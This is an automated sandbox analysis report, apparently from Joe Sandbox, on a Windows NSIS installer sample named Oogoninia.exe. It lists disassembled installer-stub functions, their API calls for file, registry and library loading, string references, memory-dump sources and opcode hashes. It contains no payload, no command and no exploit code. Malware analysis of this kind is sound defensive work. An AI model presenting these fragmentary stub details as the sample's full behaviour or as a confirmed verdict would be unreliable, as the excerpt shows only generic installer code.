                                                                                                                                                                                      • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00402D73
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Null, xrefs: 00402DF1
                                                                                                                                                                                    • C:\Users\user\Desktop\Oogoninia.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00402CFA
                                                                                                                                                                                    • Inst, xrefs: 00402DDF
                                                                                                                                                                                    • Error launching installer, xrefs: 00402D4A
                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                                                                                                    • soft, xrefs: 00402DE8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Oogoninia.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                    • API String ID: 4283519449-3195185465
                                                                                                                                                                                    • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                                                                                                                                    • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D
                                                                                                                                                                                    Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 600 401759-40177c call 402ace call 40587f 605 401786-401798 call 405da0 call 405812 lstrcatA 600->605 606 40177e-401784 call 405da0 600->606 611 40179d-4017a3 call 40600b 605->611 606->611 616 4017a8-4017ac 611->616 617 4017ae-4017b8 call 4060a4 616->617 618 4017df-4017e2 616->618 626 4017ca-4017dc 617->626 627 4017ba-4017c8 CompareFileTime 617->627 620 4017e4-4017e5 call 4059ee 618->620 621 4017ea-401806 call 405a13 618->621 620->621 628 401808-40180b 621->628 629 40187e-4018a7 call 404fb9 call 402f33 621->629 626->618 627->626 630 401860-40186a call 404fb9 628->630 631 40180d-40184f call 405da0 * 2 call 405dc2 call 405da0 call 405596 628->631 643 4018a9-4018ad 629->643 644 4018af-4018bb SetFileTime 629->644 641 401873-401879 630->641 631->616 663 401855-401856 631->663 645 402967 641->645 643->644 647 4018c1-4018cc CloseHandle 643->647 644->647 650 402969-40296d 645->650 648 4018d2-4018d5 647->648 649 40295e-402961 647->649 652 4018d7-4018e8 call 405dc2 lstrcatA 648->652 653 4018ea-4018ed call 405dc2 648->653 649->645 659 4018f2-4022d8 652->659 653->659 664 4022dd-4022e2 659->664 665 4022d8 call 405596 659->665 663->641 666 401858-401859 663->666 664->650 665->664 666->630
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                      • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Leafier Setup,NSIS Error), ref: 00405DAD
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
                                                                                                                                                                                      • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp$C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll$C:\Users\user\slavelivets$Call
                                                                                                                                                                                    • API String ID: 1941528284-3758952849
                                                                                                                                                                                    • Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                                                                                                                                    • Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D
                                                                                                                                                                                    Function 0040547F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 667 40547f-4054ca CreateDirectoryA 668 4054d0-4054dd GetLastError 667->668 669 4054cc-4054ce 667->669 670 4054f7-4054f9 668->670 671 4054df-4054f3 SetFileSecurityA 668->671 669->670 671->669 672 4054f5 GetLastError 671->672 672->670
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004054D6
                                                                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004054F5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                                                                                    • API String ID: 3449924974-2230009264
                                                                                                                                                                                    • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                    • Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA
                                                                                                                                                                                    Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID: Times New Roman
                                                                                                                                                                                    • API String ID: 3808545654-927190056
                                                                                                                                                                                    • Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                                                                                                                                    • Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E
                                                                                                                                                                                    Function 004060CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 682 4060cb-4060eb GetSystemDirectoryA 683 4060ed 682->683 684 4060ef-4060f1 682->684 683->684 685 406101-406103 684->685 686 4060f3-4060fb 684->686 687 406104-406136 wsprintfA LoadLibraryExA 685->687 686->685 688 4060fd-4060ff 686->688 688->687
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                                                                                                                                    • wsprintfA.USER32 ref: 0040611B
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                                                                    • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                    • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69
                                                                                                                                                                                    Function 00402F33 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 689 402f33-402f47 690 402f50-402f59 689->690 691 402f49 689->691 692 402f62-402f67 690->692 693 402f5b 690->693 691->690 694 402f77-402f84 call 403122 692->694 695 402f69-402f72 call 403138 692->695 693->692 699 403110 694->699 700 402f8a-402f8e 694->700 695->694 701 403112-403113 699->701 702 402f94-402fba GetTickCount 700->702 703 4030bb-4030bd 700->703 706 40311b-40311f 701->706 707 402fc0-402fc8 702->707 708 403118 702->708 704 4030fd-403100 703->704 705 4030bf-4030c2 703->705 711 403102 704->711 712 403105-40310e call 403122 704->712 705->708 713 4030c4 705->713 709 402fca 707->709 710 402fcd-402fdb call 403122 707->710 708->706 709->710 710->699 722 402fe1-402fea 710->722 711->712 712->699 723 403115 712->723 716 4030c7-4030cd 713->716 719 4030d1-4030df call 403122 716->719 720 4030cf 716->720 719->699 726 4030e1-4030ed call 405aba 719->726 720->719 725 402ff0-403010 call 40621c 722->725 723->708 731 4030b3-4030b5 725->731 732 403016-403029 GetTickCount 725->732 733 4030b7-4030b9 726->733 734 4030ef-4030f9 726->734 731->701 735 40302b-403033 732->735 736 40306e-403070 732->736 733->701 734->716 737 4030fb 734->737 738 403035-403039 735->738 739 40303b-40306b MulDiv wsprintfA call 404fb9 735->739 740 403072-403076 736->740 741 4030a7-4030ab 736->741 737->708 738->736 738->739 739->736 742 403078-40307f call 405aba 740->742 743 40308d-403098 740->743 741->707 744 4030b1 741->744 749 403084-403086 742->749 747 40309b-40309f 743->747 744->708 747->725 750 4030a5 747->750 749->733 751 403088-40308b 749->751 750->708 751->747
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: ... %d%%
                                                                                                                                                                                    • API String ID: 551687249-2449383134
                                                                                                                                                                                    • Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                                                                                                                                    • Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA
                                                                                                                                                                                    Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 752 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 759 40295e-40296d 752->759 760 40241f-402427 752->760 762 402437-40243a 760->762 763 402429-402436 call 402ace lstrlenA 760->763 764 40243c-40244d call 402aac 762->764 765 40244e-402451 762->765 763->762 764->765 770 402462-402476 RegSetValueExA 765->770 771 402453-40245d call 402f33 765->771 774 402478 770->774 775 40247b-402555 RegCloseKey 770->775 771->770 774->775 775->759 777 402729-402730 775->777 777->759
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
